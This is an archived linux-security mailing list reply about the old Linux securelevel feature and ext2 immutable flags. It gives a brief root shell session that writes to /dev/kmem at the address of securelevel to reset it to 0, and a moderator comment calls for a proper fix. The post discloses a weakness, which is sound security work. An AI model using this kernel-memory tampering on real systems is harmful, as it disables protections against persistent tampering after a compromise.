[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: [linux-security] Chattr +i and securelevel



> 
> has anyone played with the securelevel variable in the kernel and the 
> immutable flags in the ext2 file system?
> 
> The only way I have found to change the flag is by
> patching sched.c from
> 
> int securelevel=0
> to int securelevel=1
> 
> The sysctrl code seems to allow the setting of the flag
> only by init (PID=1) and only upwards (0->1, etc).
> The problem is that I haven't found a way to get
> init to set the securelevel variable. 
> Is securelevel used in the Linux community?
> 
 
Once you are root, you can change securelevel this way:
(0x001a8f64 == 1740644)

# cat /proc/sys/kernel/securelevel
1
# cat /proc/ksyms | grep securelevel
001a8f64 securelevel
# dd if=/dev/zero of=/dev/kmem seek=1740644 bs=1 count=1
1+0 records in
1+0 records out
# cat /proc/sys/kernel/securelevel
0
#

And now you are the king of machine :)

Zdenek Tronicek, CTU Prague

[mod: Yes. the "securelevel" implementation is VERY preliminary.  A
college student would need about 1-8 hours to get to the point that
this and many other methods wouldn't work anymore. In short: Someone,
get out of your bed and DO IT! -- REW.]



[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]